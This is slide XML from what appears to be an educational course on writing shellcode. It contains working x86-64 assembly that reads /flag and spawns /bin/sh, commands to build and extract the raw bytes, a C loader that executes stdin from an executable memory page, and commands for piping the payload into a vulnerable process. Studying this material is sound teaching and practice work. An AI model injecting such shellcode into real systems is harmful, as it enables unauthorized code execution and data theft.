              <a:rPr lang="en" sz="10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# trigger open("/flag", NULL)</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rdi, 1				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# first argument to sendfile is the file descriptor to output to (stdout)</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rsi, rax				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# second argument is the file descriptor returned by open</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rdx, 0				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# third argument is the number of bytes to skip from the input file</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov r10, 1000				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# fourth argument is the number of bytes to transfer to the output file</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rax, 40				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# syscall number of sendfile</a:t>
            </a:r>
            <a:endParaRPr sz="1000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syscall				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# trigger sendfile(1, fd, 0, 1000)</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rax, 60				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# syscall number of exit</a:t>
            </a:r>
            <a:endParaRPr sz="1000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syscall				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# trigger exit()</a:t>
            </a:r>
            <a:endParaRPr sz="1000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Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242;p4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>rite your shellcode as assembly:</a:t>
            </a:r>
            <a:endParaRPr sz="15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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.global _start</a:t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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>_start:</a:t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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.intel_syntax noprefix</a:t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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov rax, 59		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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# this is the syscall number of execve</a:t>
            </a:r>
            <a:endParaRPr sz="600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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>lea rdi, [rip+binsh]	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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# points the first argument of execve at the /bin/sh string below</a:t>
            </a:r>
            <a:endParaRPr sz="600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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov rsi, 0		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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# this makes the second argument, argv, NULL</a:t>
            </a:r>
            <a:endParaRPr sz="600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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov rdx, 0		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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# this makes the third argument, envp, NULL</a:t>
            </a:r>
            <a:endParaRPr sz="600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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>syscall			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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# this triggers the system call</a:t>
            </a:r>
            <a:endParaRPr sz="600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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>binsh:				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6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# a label marking where the /bin/sh string is</a:t>
            </a:r>
            <a:endParaRPr sz="600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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.string "/bin/sh"</a:t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Then, assemble it!</a:t>
            </a:r>
            <a:endParaRPr sz="15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gcc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-nostdlib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-static shellcode.s -o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shellcode-elf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This is an ELF with your shellcode as its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>. You still need to extract it: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objcopy --dump-section .text=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode-raw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shellcode-elf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The resulting shellcode-raw file contains the raw bytes of your shellcode.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This is what you would inject as part of your exploits.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Shellcode (replicating exotic conditions)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p4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need to replicate exotic conditions in ways that are too hard to do as a preamble for your shellcode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>you can build a shellcode loader in C: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page = mmap(0x1337000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, 0, 0);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1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read(0, page, 0x1000);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1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((void(*)())page)();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cat shellcode-raw | ./tester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Commands Reference</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p5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Assembling shellcode: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gcc -nostdlib -static shellcode.s -o shellcode-elf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Extracting shellcode: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objcopy --dump-section .text=shellcode-raw shellcode-elf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Disassembling shellcode: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objdump -M intel -d shellcode-elf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Sending shellcode to the stdin of a process (with user input afterwards):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cat shellcode-raw /dev/stdin | /vulnerable_process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Strace a program with your shellcode as input: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cat shellcode-raw | strace /vulnerable_process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Debug a program with your shellcode as input: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gdb /vulnerable_process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(gdb) r &lt; shellcode-raw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 Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p5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pwntools (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/Gallopsled/pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>), a library for writing exploits (and shellcode).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rappel (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/yrp604/rappel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) lets you explore the effects of instructions.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easily installable via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/zardus/ctf-tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  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amd64 opcode listing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://ref.x86asm.net/coder64.html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Several gdb plugins exist to make exploit debugging easier!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hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://github.com/scwuaptx/Pwngdb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hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/pwndbg/pwndbg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hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://github.com/longld/peda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>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ashvili 2017.08b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ashvili 2017.08b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